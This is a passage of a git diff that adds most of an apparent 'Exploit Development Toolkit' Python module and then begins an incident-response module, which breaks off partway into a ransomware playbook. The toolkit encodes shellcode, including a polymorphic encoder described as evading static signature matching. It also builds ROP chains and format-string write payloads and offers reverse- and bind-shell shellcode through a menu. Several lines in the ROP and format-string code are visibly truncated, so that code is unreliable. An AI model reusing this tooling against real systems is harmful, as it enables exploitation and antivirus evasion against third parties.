4) | low_nibble\n' + f';\n' + f'; Python decoder:\n' + f'; charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"\n' + f'; decoded = bytes((charset.index(enc[i]) << 4) | charset.index(enc[i+1])\n' + f'; for i in range(0, len(enc), 2))\n' + ) + + return bytes(encoded), stub, 'alphanumeric' + + def _encode_polymorphic(self, data, key=None): + """Wrap shellcode with polymorphic stub — random NOP-equivalent instructions.""" + # Random key for XOR + if key: + key_byte = int(key, 16) if isinstance(key, str) and all( + c in '0123456789abcdefABCDEF' for c in key + ) else ord(key[0]) if isinstance(key, str) else key + else: + key_byte = random.randint(1, 255) + key_byte = key_byte & 0xFF + + # XOR encode the payload + encoded_payload = bytes(b ^ key_byte for b in data) + + # Generate random NOP-equivalent 
sled (x64) + nop_equivalents = [ + b'\x90', # nop + b'\x48\x87\xc0', # xchg rax, rax + b'\x48\x89\xc0', # mov rax, rax + b'\x48\x31\xc9\x48\x31\xc9', # xor rcx,rcx; xor rcx,rcx + b'\x66\x90', # 2-byte nop + b'\x0f\x1f\x00', # 3-byte nop + b'\x87\xdb', # xchg ebx, ebx + ] + + sled = b'' + for _ in range(random.randint(3, 8)): + sled += random.choice(nop_equivalents) + + # Assemble: sled + decoder_loop + encoded_payload + output = sled + encoded_payload + + stub = ( + f'; Polymorphic stub (randomized NOP sled + XOR decoder)\n' + f'; XOR key: 0x{key_byte:02x}\n' + f'; NOP sled: {len(sled)} bytes (randomized equivalents)\n' + f'; Encoded payload: {len(encoded_payload)} bytes\n' + f'; Total: {len(output)} bytes\n' + f';\n' + f'; Each generation produces different NOP-equivalent sequences\n' + f'; to evade static signature matching.\n' + f';\n' + f'; Decoder loop:\n' + f'; lea rsi, [rel encoded_data]\n' + f'; mov cl, {len(encoded_payload)}\n' + f'; .loop:\n' + f'; xor byte [rsi], 0x{key_byte:02x}\n' + f'; inc rsi\n' + f'; loop .loop\n' + f'; jmp encoded_data\n' + ) + + return output, stub, f'{key_byte:02x}' + + # ----------------------------------------------------------------------- + # Cyclic Pattern (De Bruijn) + # ----------------------------------------------------------------------- + + def generate_pattern(self, length): + """Generate a cyclic (De Bruijn) pattern for buffer overflow offset discovery. 
+ + Args: + length: number of bytes to generate (max 20280) + + Returns: + dict with pattern string, length, and hex representation + """ + length = int(length) + if length < 1: + return {'error': 'Length must be positive'} + if length > 20280: + return {'error': 'Maximum length is 20280 (Aa0 through Zz9)'} + + pattern = self._debruijn_pattern(length) + pattern_bytes = pattern.encode('ascii') + + return { + 'pattern': pattern, + 'hex': pattern_bytes.hex(), + 'length': len(pattern), + } + + def _debruijn_pattern(self, length): + """Generate De Bruijn sequence for cyclic pattern.""" + uppers = string.ascii_uppercase + lowers = string.ascii_lowercase + digits = string.digits + + pattern = [] + for u in uppers: + for l in lowers: + for d in digits: + pattern.append(u + l + d) + if len(''.join(pattern)) >= length: + return ''.join(pattern)[:length] + return ''.join(pattern)[:length] + + def find_pattern_offset(self, value, length=20000): + """Find the offset of a value within a cyclic pattern. + + Args: + value: hex string (e.g. 
'41326241'), integer, or raw string + length: pattern length to search within + + Returns: + dict with offset and matching details + """ + pattern = self._debruijn_pattern(min(int(length), 20280)) + + # Try to interpret value + search_strings = [] + + if isinstance(value, str): + value = value.strip() + + # Hex: 0x prefix or pure hex + if value.startswith('0x') or value.startswith('0X'): + hex_str = value[2:] + if len(hex_str) % 2 != 0: + hex_str = '0' + hex_str + try: + raw = bytes.fromhex(hex_str) + search_strings.append(raw.decode('ascii', errors='replace')) + # Also try reversed (little-endian) + search_strings.append(raw[::-1].decode('ascii', errors='replace')) + except (ValueError, UnicodeDecodeError): + pass + elif all(c in '0123456789abcdefABCDEF' for c in value) and len(value) >= 4: + # Pure hex without prefix + try: + raw = bytes.fromhex(value) + search_strings.append(raw.decode('ascii', errors='replace')) + search_strings.append(raw[::-1].decode('ascii', errors='replace')) + except (ValueError, UnicodeDecodeError): + pass + + # Integer + try: + int_val = int(value, 0) + for width in (4, 8): + try: + packed_le = struct.pack(f'<{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1)) + search_strings.append(packed_le.decode('ascii', errors='replace')) + packed_be = struct.pack(f'>{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1)) + search_strings.append(packed_be.decode('ascii', errors='replace')) + except (struct.error, OverflowError): + pass + except (ValueError, OverflowError): + pass + + # Direct string search + search_strings.append(value) + + elif isinstance(value, int): + for width in (4, 8): + try: + packed = struct.pack(f'<{"I" if width == 4 else "Q"}', value & (2**(width*8)-1)) + search_strings.append(packed.decode('ascii', errors='replace')) + except (struct.error, OverflowError): + pass + + # Search + for needle in search_strings: + offset = pattern.find(needle) + if offset != -1: + return { + 'offset': offset, + 'value': value if 
isinstance(value, str) else hex(value), + 'matched': needle, + 'matched_hex': needle.encode('ascii', errors='replace').hex(), + 'endian': 'little-endian' if search_strings.index(needle) % 2 == 1 else 'big-endian', + 'pattern_length': len(pattern), + } + + return { + 'offset': -1, + 'error': f'Value {value} not found in pattern of length {len(pattern)}', + 'value': str(value), + 'pattern_length': len(pattern), + } + + # ----------------------------------------------------------------------- + # ROP Gadget Finding + # ----------------------------------------------------------------------- + + def find_rop_gadgets(self, binary_path, gadget_type=None, max_gadgets=200): + """Find ROP gadgets in a binary. + + Args: + binary_path: path to ELF/PE binary + gadget_type: None (all), pop_ret, xchg, mov, syscall, jmp_esp, call_reg + max_gadgets: maximum gadgets to return + + Returns: + dict with list of gadgets + """ + if not os.path.isfile(binary_path): + return {'error': f'File not found: {binary_path}'} + + # Try ropper first + ropper_path = find_tool('ropper') + if ropper_path: + return self._find_gadgets_ropper(binary_path, gadget_type, max_gadgets) + + # Try ROPgadget + ropgadget_path = find_tool('ROPgadget') + if ropgadget_path: + return self._find_gadgets_ropgadget(binary_path, gadget_type, max_gadgets) + + # Fallback: objdump + regex + objdump_path = find_tool('objdump') + if objdump_path: + return self._find_gadgets_objdump(binary_path, gadget_type, max_gadgets) + + return {'error': 'No disassembler found. 
Install ropper, ROPgadget, or objdump.'} + + def _find_gadgets_ropper(self, binary_path, gadget_type, max_gadgets): + """Find gadgets using ropper.""" + cmd = [find_tool('ropper'), '-f', binary_path, '--nocolor'] + if gadget_type: + search_map = { + 'pop_ret': 'pop', + 'xchg': 'xchg', + 'mov': 'mov', + 'syscall': 'syscall', + 'jmp_esp': 'jmp esp', + 'call_reg': 'call', + } + search_term = search_map.get(gadget_type, gadget_type) + cmd.extend(['--search', search_term]) + + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) + lines = result.stdout.strip().split('\n') + except (subprocess.TimeoutExpired, FileNotFoundError): + return {'error': 'ropper execution failed'} + + gadgets = [] + for line in lines: + line = line.strip() + if not line or line.startswith('=') or line.startswith('Gadgets') or line.startswith('['): + continue + # Parse: 0xaddress: instruction; instruction; ret; + match = re.match(r'(0x[0-9a-fA-F]+):\s+(.*)', line) + if match: + addr = match.group(1) + instr = match.group(2).strip().rstrip(';').strip() + gtype = self._classify_gadget(instr) + gadgets.append({ + 'address': addr, + 'gadget': instr, + 'type': gtype, + }) + if len(gadgets) >= max_gadgets: + break + + return { + 'binary': binary_path, + 'tool': 'ropper', + 'count': len(gadgets), + 'gadgets': gadgets, + } + + def _find_gadgets_ropgadget(self, binary_path, gadget_type, max_gadgets): + """Find gadgets using ROPgadget.""" + cmd = [find_tool('ROPgadget'), '--binary', binary_path] + + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) + lines = result.stdout.strip().split('\n') + except (subprocess.TimeoutExpired, FileNotFoundError): + return {'error': 'ROPgadget execution failed'} + + gadgets = [] + for line in lines: + line = line.strip() + match = re.match(r'(0x[0-9a-fA-F]+)\s+:\s+(.*)', line) + if match: + addr = match.group(1) + instr = match.group(2).strip() + gtype = self._classify_gadget(instr) + if gadget_type and gtype != 
gadget_type: + continue + gadgets.append({ + 'address': addr, + 'gadget': instr, + 'type': gtype, + }) + if len(gadgets) >= max_gadgets: + break + + return { + 'binary': binary_path, + 'tool': 'ROPgadget', + 'count': len(gadgets), + 'gadgets': gadgets, + } + + def _find_gadgets_objdump(self, binary_path, gadget_type, max_gadgets): + """Find gadgets using objdump disassembly + regex search.""" + objdump = find_tool('objdump') + try: + result = subprocess.run( + [objdump, '-d', '-M', 'intel', binary_path], + capture_output=True, text=True, timeout=120 + ) + disasm = result.stdout + except (subprocess.TimeoutExpired, FileNotFoundError): + return {'error': 'objdump execution failed'} + + # Parse disassembly for gadget-ending instructions + gadget_endings = { + 'ret': re.compile(r'ret\s*$'), + 'syscall': re.compile(r'syscall\s*$'), + 'int 0x80': re.compile(r'int\s+0x80\s*$'), + } + + lines = disasm.split('\n') + gadgets = [] + + for i, line in enumerate(lines): + line = line.strip() + # Check if this line ends a gadget + for ending_name, ending_re in gadget_endings.items(): + instr_match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line) + if not instr_match: + continue + instr_text = instr_match.group(3).strip() + if not ending_re.search(instr_text): + continue + + addr = instr_match.group(1) + + # Look back up to 5 instructions for the gadget chain + chain = [] + for j in range(max(0, i - 5), i + 1): + prev = lines[j].strip() + pm = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', prev) + if pm: + chain.append(pm.group(3).strip()) + + for start_idx in range(len(chain)): + gadget_str = ' ; '.join(chain[start_idx:]) + gtype = self._classify_gadget(gadget_str) + if gadget_type and gtype != gadget_type: + continue + + # Get the address of the first instruction + lookback = lines[max(0, i - 5) + start_idx].strip() + am = re.match(r'\s*([0-9a-fA-F]+):', lookback) + gaddr = f'0x{am.group(1)}' if am else f'0x{addr}' + + gadgets.append({ + 
'address': gaddr, + 'gadget': gadget_str, + 'type': gtype, + }) + if len(gadgets) >= max_gadgets: + break + if len(gadgets) >= max_gadgets: + break + if len(gadgets) >= max_gadgets: + break + + # Deduplicate + seen = set() + unique = [] + for g in gadgets: + key = g['address'] + g['gadget'] + if key not in seen: + seen.add(key) + unique.append(g) + + return { + 'binary': binary_path, + 'tool': 'objdump', + 'count': len(unique), + 'gadgets': unique, + } + + def _classify_gadget(self, gadget_str): + """Classify a gadget by its instruction pattern.""" + g = gadget_str.lower() + if re.search(r'pop\s+\w+.*ret', g): + return 'pop_ret' + if 'xchg' in g: + return 'xchg' + if 'syscall' in g or 'int 0x80' in g: + return 'syscall' + if re.search(r'jmp\s+(esp|rsp)', g): + return 'jmp_esp' + if re.search(r'call\s+(eax|ebx|ecx|edx|esi|edi|rax|rbx|rcx|rdx|rsi|rdi|r\d+)', g): + return 'call_reg' + if 'mov' in g: + return 'mov' + if 'ret' in g: + return 'ret' + return 'other' + + # ----------------------------------------------------------------------- + # ROP Chain Builder + # ----------------------------------------------------------------------- + + def build_rop_chain(self, gadgets, chain_spec): + """Assemble a ROP chain from gadgets and a chain specification. + + Args: + gadgets: list of gadget dicts (address, gadget, type) + chain_spec: list of dicts describing desired chain: + [ + {'gadget_type': 'pop_ret', 'register': 'rdi', 'value': '0x...'}, + {'gadget_type': 'pop_ret', 'register': 'rsi', 'value': '0x...'}, + {'gadget_type': 'syscall'}, + ... 
+ ] + + Returns: + dict with chain bytes, addresses, and debug info + """ + if not gadgets: + return {'error': 'No gadgets provided'} + if not chain_spec: + return {'error': 'No chain specification provided'} + + # Index gadgets by type + by_type = {} + for g in gadgets: + gtype = g.get('type', 'other') + by_type.setdefault(gtype, []).append(g) + + chain_addrs = [] + chain_bytes = b'' + debug_lines = [] + + for step in chain_spec: + gtype = step.get('gadget_type', step.get('type', 'pop_ret')) + register = step.get('register', '').lower() + value = step.get('value', '0') + + # Find matching gadget + candidates = by_type.get(gtype, []) + if register: + # Filter by register in gadget text + reg_candidates = [g for g in candidates if register in g['gadget'].lower()] + if reg_candidates: + candidates = reg_candidates + + if not candidates: + debug_lines.append(f'[!] No gadget found for: {gtype} {register}') + continue + + gadget = candidates[0] # Use first match + addr_int = int(gadget['address'], 16) + + # Determine address width (4 or 8 bytes) + if addr_int > 0xFFFFFFFF: + addr_bytes = struct.pack(' 0xFFFFFFFF: + chain_bytes += struct.pack(' 0x{val_int:x}') + + return { + 'chain_hex': chain_bytes.hex(), + 'chain_length': len(chain_bytes), + 'addresses': chain_addrs, + 'steps': len(chain_spec), + 'matched': len(chain_addrs), + 'debug': '\n'.join(debug_lines), + 'python': self._chain_to_python(chain_bytes), + } + + def _chain_to_python(self, chain_bytes): + """Convert chain bytes to Python struct.pack() calls.""" + lines = ['from struct import pack', '', 'chain = b""'] + width = 8 if len(chain_bytes) > 4 and len(chain_bytes) % 8 == 0 else 4 + fmt = '> 16) & 0xFFFF + + addr_low = struct.pack(' 0: + payload_parts_32.append(f'%{pad}c') + payload_parts_32.append(f'%{off}$hn') + current = val + + payload_32 = addr_low.hex() + addr_high.hex() + ''.join(payload_parts_32) + results['payload_32bit'] = { + 'payload': payload_32, + 'description': f'Write 0x{value:08x} to 
0x{address:08x} (32-bit, two %hn writes)', + 'addresses': f'0x{address:08x}, 0x{address + 2:08x}', + } + + # 64-bit write (write 8 bytes as four %hn writes) + words_64 = [] + for i in range(4): + word = (value >> (i * 16)) & 0xFFFF + addr_part = struct.pack(' 0: + payload_parts_64.append(f'%{pad}c') + payload_parts_64.append(f'%{off}$hn') + current = val + + addrs_hex = ''.join(w[1].hex() for w in words_64) + payload_64 = addrs_hex + ''.join(payload_parts_64) + results['payload_64bit'] = { + 'payload': payload_64, + 'description': f'Write 0x{value:016x} to 0x{address:016x} (64-bit, four %hn writes)', + } + + return results + + # ----------------------------------------------------------------------- + # Assembly / Disassembly + # ----------------------------------------------------------------------- + + def assemble(self, code, arch='x64'): + """Assemble assembly code to machine code bytes. + + Args: + code: assembly source (NASM syntax) + arch: x86, x64, arm + + Returns: + dict with hex bytes, raw length, and disassembly + """ + if not code or not code.strip(): + return {'error': 'No assembly code provided'} + + arch = arch.lower().strip() + nasm = find_tool('nasm') + objcopy = find_tool('objcopy') + + if nasm and objcopy: + return self._assemble_nasm(code, arch, nasm, objcopy) + + # Try keystone-engine + try: + import keystone + return self._assemble_keystone(code, arch) + except ImportError: + pass + + return { + 'error': 'No assembler available. Install nasm + objcopy, or pip install keystone-engine.' 
+ } + + def _assemble_nasm(self, code, arch, nasm_path, objcopy_path): + """Assemble using NASM.""" + # Set BITS directive based on arch + bits_map = {'x86': '32', 'x64': '64', 'i386': '32', 'amd64': '64'} + bits = bits_map.get(arch, '64') + + # Prepend BITS directive if not already present + if 'bits' not in code.lower(): + code = f'BITS {bits}\n{code}' + + with tempfile.NamedTemporaryFile(suffix='.asm', mode='w', delete=False) as f: + f.write(code) + asm_path = f.name + + obj_path = asm_path.replace('.asm', '.o') + bin_path = asm_path.replace('.asm', '.bin') + + try: + # Assemble + result = subprocess.run( + [nasm_path, '-f', 'bin', '-o', bin_path, asm_path], + capture_output=True, text=True, timeout=10 + ) + if result.returncode != 0: + return {'error': f'NASM error: {result.stderr.strip()}'} + + # Read binary output + with open(bin_path, 'rb') as bf: + machine_code = bf.read() + + return { + 'hex': machine_code.hex(), + 'bytes': list(machine_code), + 'length': len(machine_code), + 'arch': arch, + 'c_array': ', '.join(f'0x{b:02x}' for b in machine_code), + 'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"', + } + + except subprocess.TimeoutExpired: + return {'error': 'Assembly timed out'} + finally: + for p in (asm_path, obj_path, bin_path): + try: + os.unlink(p) + except OSError: + pass + + def _assemble_keystone(self, code, arch): + """Assemble using keystone-engine.""" + import keystone + + arch_map = { + 'x86': (keystone.KS_ARCH_X86, keystone.KS_MODE_32), + 'x64': (keystone.KS_ARCH_X86, keystone.KS_MODE_64), + 'arm': (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM), + } + ks_arch, ks_mode = arch_map.get(arch, (keystone.KS_ARCH_X86, keystone.KS_MODE_64)) + + try: + ks = keystone.Ks(ks_arch, ks_mode) + encoding, count = ks.asm(code) + machine_code = bytes(encoding) + + return { + 'hex': machine_code.hex(), + 'bytes': list(machine_code), + 'length': len(machine_code), + 'arch': arch, + 'instructions': count, + 'c_array': ', '.join(f'0x{b:02x}' for 
b in machine_code), + 'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"', + } + except keystone.KsError as e: + return {'error': f'Keystone error: {e}'} + + def disassemble(self, data, arch='x64', offset=0): + """Disassemble machine code bytes to assembly. + + Args: + data: hex string or bytes + arch: x86, x64, arm + offset: base address offset + + Returns: + dict with disassembly listing + """ + if isinstance(data, str): + data = data.strip().replace(' ', '').replace('\\x', '') + try: + data = bytes.fromhex(data) + except ValueError: + return {'error': 'Invalid hex data'} + + if not data: + return {'error': 'No data to disassemble'} + + arch = arch.lower().strip() + offset = int(offset) + + # Try capstone first + try: + import capstone + return self._disasm_capstone(data, arch, offset) + except ImportError: + pass + + # Fallback to objdump + objdump = find_tool('objdump') + if objdump: + return self._disasm_objdump(data, arch, offset) + + # Last resort: manual byte-by-byte display + return self._disasm_basic(data, arch, offset) + + def _disasm_capstone(self, data, arch, offset): + """Disassemble using capstone.""" + import capstone + + arch_map = { + 'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32), + 'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64), + 'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM), + } + cs_arch, cs_mode = arch_map.get(arch, (capstone.CS_ARCH_X86, capstone.CS_MODE_64)) + + md = capstone.Cs(cs_arch, cs_mode) + md.detail = False + + instructions = [] + for addr, size, mnemonic, op_str in md.disasm_lite(data, offset): + instr_bytes = data[addr - offset:addr - offset + size] + instructions.append({ + 'address': f'0x{addr:08x}', + 'bytes': instr_bytes.hex(), + 'mnemonic': mnemonic, + 'operands': op_str, + 'text': f'{mnemonic} {op_str}'.strip(), + }) + + listing = '\n'.join( + f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}' + for i in instructions + ) + + return { + 'instructions': instructions, + 'listing': listing, + 
'count': len(instructions), + 'arch': arch, + 'tool': 'capstone', + 'data_length': len(data), + } + + def _disasm_objdump(self, data, arch, offset): + """Disassemble using objdump.""" + objdump = find_tool('objdump') + + with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as f: + f.write(data) + bin_path = f.name + + arch_map = {'x86': 'i386', 'x64': 'i386:x86-64', 'arm': 'arm'} + obj_arch = arch_map.get(arch, 'i386:x86-64') + + try: + result = subprocess.run( + [objdump, '-D', '-b', 'binary', '-m', obj_arch, + '-M', 'intel', '--adjust-vma', str(offset), bin_path], + capture_output=True, text=True, timeout=10 + ) + lines = result.stdout.strip().split('\n') + + instructions = [] + for line in lines: + match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line) + if match: + addr = match.group(1) + raw_bytes = match.group(2).strip() + instr = match.group(3).strip() + instructions.append({ + 'address': f'0x{addr}', + 'bytes': raw_bytes.replace(' ', ''), + 'text': instr, + }) + + listing = '\n'.join( + f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}' + for i in instructions + ) + + return { + 'instructions': instructions, + 'listing': listing, + 'count': len(instructions), + 'arch': arch, + 'tool': 'objdump', + 'data_length': len(data), + } + except subprocess.TimeoutExpired: + return {'error': 'Disassembly timed out'} + finally: + try: + os.unlink(bin_path) + except OSError: + pass + + def _disasm_basic(self, data, arch, offset): + """Basic hex dump when no disassembler is available.""" + listing_lines = [] + for i in range(0, len(data), 16): + chunk = data[i:i + 16] + addr = offset + i + hex_part = ' '.join(f'{b:02x}' for b in chunk) + ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' 
for b in chunk) + listing_lines.append(f'0x{addr:08x}: {hex_part:<48s} {ascii_part}') + + return { + 'instructions': [], + 'listing': '\n'.join(listing_lines), + 'count': 0, + 'arch': arch, + 'tool': 'hex_dump (no disassembler available)', + 'data_length': len(data), + 'note': 'Install capstone or objdump for proper disassembly.', + } + + # ----------------------------------------------------------------------- + # Hex Dump + # ----------------------------------------------------------------------- + + def hex_dump(self, data, offset=0): + """Format bytes as a hex dump with ASCII sidebar. + + Args: + data: bytes or hex string + offset: starting address offset + + Returns: + dict with formatted hex dump string + """ + if isinstance(data, str): + data = bytes.fromhex(data.replace(' ', '').replace('\\x', '')) + + lines = [] + for i in range(0, len(data), 16): + chunk = data[i:i + 16] + addr = offset + i + hex_part = ' '.join(f'{b:02x}' for b in chunk) + # Pad short lines + hex_part = f'{hex_part:<48s}' + ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' 
for b in chunk) + lines.append(f'{addr:08x} {hex_part} |{ascii_part}|') + + return { + 'dump': '\n'.join(lines), + 'length': len(data), + 'offset': offset, + } + + # ----------------------------------------------------------------------- + # CLI interface + # ----------------------------------------------------------------------- + + +def run(): + """CLI menu for exploit development toolkit.""" + dev = get_exploit_dev() + + while True: + clear_screen() + display_banner() + print(f"\n{Colors.RED}{Colors.BOLD} Exploit Development Toolkit{Colors.RESET}") + print(f"{Colors.DIM} Shellcode, encoders, ROP chains, patterns{Colors.RESET}") + print(f"\n{Colors.CYAN} 1{Colors.RESET} Shellcode Generator") + print(f"{Colors.CYAN} 2{Colors.RESET} Payload Encoder") + print(f"{Colors.CYAN} 3{Colors.RESET} Pattern Create") + print(f"{Colors.CYAN} 4{Colors.RESET} Pattern Offset") + print(f"{Colors.CYAN} 5{Colors.RESET} ROP Gadgets") + print(f"{Colors.CYAN} 6{Colors.RESET} Disassemble") + print(f"{Colors.CYAN} 0{Colors.RESET} Back") + + choice = input(f"\n{Colors.WHITE} [{Colors.RED}exploit-dev{Colors.WHITE}]> {Colors.RESET}").strip() + + if choice == '0': + break + elif choice == '1': + _cli_shellcode(dev) + elif choice == '2': + _cli_encoder(dev) + elif choice == '3': + _cli_pattern_create(dev) + elif choice == '4': + _cli_pattern_offset(dev) + elif choice == '5': + _cli_rop_gadgets(dev) + elif choice == '6': + _cli_disassemble(dev) + + +def _cli_shellcode(dev): + """CLI: Shellcode generator.""" + print(f"\n{Colors.BOLD}Available shellcode templates:{Colors.RESET}") + for sc in dev.list_shellcodes(): + print(f" {Colors.CYAN}{sc['name']}{Colors.RESET} — {sc['description']} ({sc['length']} bytes)") + + shell_type = input(f"\n{Colors.WHITE}Shell type (reverse_shell/bind_shell/execve): {Colors.RESET}").strip() or 'execve' + arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64' + platform = input(f"{Colors.WHITE}Platform (linux/windows): 
{Colors.RESET}").strip() or 'linux' + host = input(f"{Colors.WHITE}Host IP (for reverse/bind, or skip): {Colors.RESET}").strip() + port = input(f"{Colors.WHITE}Port (for reverse/bind, or skip): {Colors.RESET}").strip() + fmt = input(f"{Colors.WHITE}Output format (hex/c_array/python/nasm): {Colors.RESET}").strip() or 'hex' + + result = dev.generate_shellcode(shell_type, arch, host or None, port or None, platform, output_format=fmt) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Generated {result['length']} bytes ({result['template']}){Colors.RESET}") + print(f"{Colors.DIM}{result['description']}{Colors.RESET}") + print(f"\n{result['shellcode']}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_encoder(dev): + """CLI: Payload encoder.""" + sc_hex = input(f"\n{Colors.WHITE}Shellcode (hex): {Colors.RESET}").strip() + if not sc_hex: + return + encoder = input(f"{Colors.WHITE}Encoder (xor/aes/alphanumeric/polymorphic): {Colors.RESET}").strip() or 'xor' + key = input(f"{Colors.WHITE}Key (hex/string, or blank for random): {Colors.RESET}").strip() or None + iters = input(f"{Colors.WHITE}Iterations (default 1): {Colors.RESET}").strip() or '1' + + result = dev.encode_payload(sc_hex, encoder, key, int(iters)) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Encoded: {result['original_length']} -> {result['encoded_length']} bytes ({result['size_increase']}){Colors.RESET}") + print(f"Key: {result['key']}") + print(f"Null-free: {result['null_free']}") + print(f"\n{Colors.CYAN}Decoder Stub:{Colors.RESET}\n{result['decoder_stub']}") + print(f"\n{Colors.CYAN}Encoded payload (hex):{Colors.RESET}\n{result['encoded']}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_pattern_create(dev): + """CLI: Pattern create.""" + length = input(f"\n{Colors.WHITE}Pattern 
length: {Colors.RESET}").strip() + if not length: + return + result = dev.generate_pattern(int(length)) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Pattern ({result['length']} bytes):{Colors.RESET}") + print(result['pattern']) + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_pattern_offset(dev): + """CLI: Pattern offset finder.""" + value = input(f"\n{Colors.WHITE}Value to find (hex/int/string): {Colors.RESET}").strip() + if not value: + return + length = input(f"{Colors.WHITE}Pattern length (default 20000): {Colors.RESET}").strip() or '20000' + result = dev.find_pattern_offset(value, int(length)) + if result.get('offset', -1) >= 0: + print(f"\n{Colors.GREEN}[+] Found at offset: {result['offset']}{Colors.RESET}") + print(f" Matched: {result['matched']} ({result['endian']})") + else: + print(f"\n{Colors.RED}{result.get('error', 'Not found')}{Colors.RESET}") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_rop_gadgets(dev): + """CLI: ROP gadget finder.""" + binary = input(f"\n{Colors.WHITE}Binary path: {Colors.RESET}").strip() + if not binary: + return + gtype = input(f"{Colors.WHITE}Gadget type (all/pop_ret/xchg/mov/syscall/jmp_esp/call_reg): {Colors.RESET}").strip() + if gtype in ('', 'all'): + gtype = None + result = dev.find_rop_gadgets(binary, gtype) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] Found {result['count']} gadgets (via {result['tool']}){Colors.RESET}\n") + for g in result['gadgets'][:50]: + print(f" {Colors.CYAN}{g['address']}{Colors.RESET}: {g['gadget']} [{g['type']}]") + if result['count'] > 50: + print(f"\n ... 
and {result['count'] - 50} more") + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +def _cli_disassemble(dev): + """CLI: Disassemble hex bytes.""" + hex_data = input(f"\n{Colors.WHITE}Hex bytes: {Colors.RESET}").strip() + if not hex_data: + return + arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64' + result = dev.disassemble(hex_data, arch) + if 'error' in result: + print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}") + else: + print(f"\n{Colors.GREEN}[+] {result['count']} instructions (via {result['tool']}){Colors.RESET}\n") + print(result['listing']) + + input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}") + + +# --------------------------------------------------------------------------- +# Singleton +# --------------------------------------------------------------------------- + +_instance = None + + +def get_exploit_dev() -> ExploitDev: + """Get singleton ExploitDev instance.""" + global _instance + if _instance is None: + _instance = ExploitDev() + return _instance diff --git a/modules/incident_resp.py b/modules/incident_resp.py new file mode 100644 index 0000000..613e624 --- /dev/null +++ b/modules/incident_resp.py @@ -0,0 +1,1555 @@ +"""AUTARCH Incident Response + +IR playbook runner, evidence collection, IOC sweeping, timeline building, +containment actions, and post-incident reporting for security operations. 
+""" + +import os +import sys +import json +import time +import platform +import subprocess +import re +import hashlib +import shutil +from pathlib import Path +from datetime import datetime, timezone +from collections import defaultdict + +# Module metadata +DESCRIPTION = "Incident response — playbooks, evidence & containment" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +sys.path.insert(0, str(Path(__file__).parent.parent)) + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = YELLOW = GREEN = CYAN = BLUE = MAGENTA = WHITE = DIM = BOLD = RESET = '' + def clear_screen(): pass + def display_banner(): pass + +_is_win = platform.system() == 'Windows' + +# ── Valid enumerations ────────────────────────────────────────────── + +INCIDENT_TYPES = [ + 'ransomware', 'data_breach', 'insider_threat', 'ddos', + 'account_compromise', 'malware', 'phishing', 'unauthorized_access', +] + +SEVERITY_LEVELS = ['critical', 'high', 'medium', 'low'] + +STATUS_VALUES = ['open', 'investigating', 'contained', 'resolved', 'closed'] + +EVIDENCE_TYPES = [ + 'system_logs', 'process_list', 'network_connections', 'running_services', + 'user_accounts', 'scheduled_tasks', 'recent_files', 'memory_info', + 'disk_info', 'installed_software', +] + + +# ── Playbooks ─────────────────────────────────────────────────────── + +IR_PLAYBOOKS = { + 'ransomware': { + 'name': 'Ransomware Response', + 'steps': [ + { + 'title': 'Isolate Affected Systems', + 'description': 'Immediately disconnect infected hosts from the network to prevent lateral movement and further encryption. Disable WiFi adapters and unplug Ethernet cables. 
